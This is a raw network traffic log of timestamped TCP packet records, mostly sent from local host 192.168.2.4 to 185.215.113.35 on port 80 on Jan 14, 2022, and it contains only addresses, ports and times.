Jan 14, 2022 00:16:08.222059965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222184896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222301960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222441912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222537041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222646952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222745895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222850084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.222946882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223048925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223143101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223251104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223345995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223457098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223542929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223644972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223728895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223824978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.223912001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224014997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224109888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224220991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224291086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224378109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224476099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224564075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224662066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224745035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224841118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.224926949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225044012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225147963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225246906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225331068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225430965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225512981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225611925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225696087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225794077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225881100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.225999117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226097107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226197004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226294041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226393938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226486921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226589918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226680040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226783991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226876974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.226980925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227087021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227180004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227269888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227365971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227452993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227547884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227637053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227732897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227837086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.227915049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228015900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228104115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228204012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228286028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228383064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228478909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228580952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228720903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228822947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.228907108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229005098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229090929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229190111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229279041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229376078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229460001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229558945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229641914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229737997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229832888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.229919910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230032921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230125904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230232000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230406046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230523109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230608940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230710030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230803967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.230906963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231015921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231122971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231224060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231395960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231489897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231579065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231674910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231760025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.231846094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.246910095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247044086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247143030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247246981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247343063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247447014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247531891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247622013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247705936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247796059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247883081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.247976065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248079062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248205900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248310089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248400927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248486042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248578072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248661041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248753071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248836994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.248929977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.249027967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.249121904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.249214888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.249317884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.252796888 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.254044056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.254817009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.255075932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.255239010 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.255475998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.255847931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.256092072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.256354094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.256587982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.256814003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257030010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257225990 CET	49904	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257328987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257422924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257518053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257607937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257698059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257790089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257874966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.257968903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258060932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258146048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258246899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258341074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258433104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258517027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258614063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258697987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258790016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258882046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.258981943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259072065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259185076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259227037 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.259263039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259403944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259488106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259573936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259665966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259751081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259829998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259912014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.259996891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260111094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260174990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260288954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260381937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260461092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260545015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260627031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260710955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260793924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260880947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.260966063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261049986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261133909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261217117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261313915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261393070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261482954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261584997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261699915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261787891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261878014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.261985064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.271507978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.271617889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.271734953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.271828890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.271912098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272003889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272083044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272176981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272264004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272351980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272428989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272521019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272619009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272722960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272830009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.272924900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273010015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273091078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273173094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273305893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273402929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273484945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273577929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273652077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273736954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273840904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.273926973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274020910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274113894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274200916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274331093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274425030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274516106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274605989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274698973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274786949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274876118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.274966955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275063992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275151968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275237083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275365114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275446892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275535107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275619030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275700092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275785923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275868893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.275950909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276036978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276119947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276205063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276303053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276390076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276470900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276557922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276643991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276726007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276813030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276896000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.276977062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277065039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277146101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277230978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277354002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277437925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277522087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277611017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277689934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277780056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277862072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.277945042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278029919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278117895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278201103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278295994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278382063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278464079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278544903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278556108 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.278650045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278737068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278820038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278902054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.278990984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279073954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279161930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279259920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279337883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279428959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279509068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279597044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279675007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279757023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.279973030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280225992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280328035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280410051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280497074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280576944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280667067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280750036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280831099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.280919075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.281002998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.281086922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.281172991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.296888113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297012091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297141075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297240019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297322989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297422886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297508955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297604084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297684908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297779083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297859907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.297954082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.298041105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.298136950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.298218012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.305941105 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.309703112 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.310683012 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.317815065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.317939043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318036079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318146944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318288088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318377972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318481922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318588972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318672895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318767071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318851948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.318943024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319031000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319127083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319207907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319344997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319437981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319555044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319634914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319735050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319817066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.319919109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320018053 CET	49902	80	192.168.2.4	185.215.113.35
